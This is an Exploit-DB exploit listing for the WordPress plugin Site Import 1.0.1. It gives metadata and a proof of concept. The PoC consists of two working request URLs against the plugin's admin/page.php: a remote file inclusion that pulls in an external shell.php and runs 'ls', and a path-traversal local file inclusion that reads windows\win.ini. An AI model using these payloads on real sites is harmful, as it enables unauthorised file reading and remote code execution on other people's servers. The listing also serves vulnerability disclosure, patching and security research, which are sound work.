WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion

Author: Wadeek
type: webapps
platform: php
port: 80.0
date_added: 2016-03-14  
date_updated: 2018-09-11  
verified: 1  
codes:   
tags: WordPress Plugin  
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt40000/39558.png  
application_url: http://www.exploit-db.comsite-import.1.0.1.zip  

raw file: 39558.txt  
# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
# Version: 1.0.1
# Tested on: Xampp on Windows7

[Version Disclosure]
======================================
/wp-content/plugins/site-import/readme.txt
======================================
[PoC]
======================================
Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================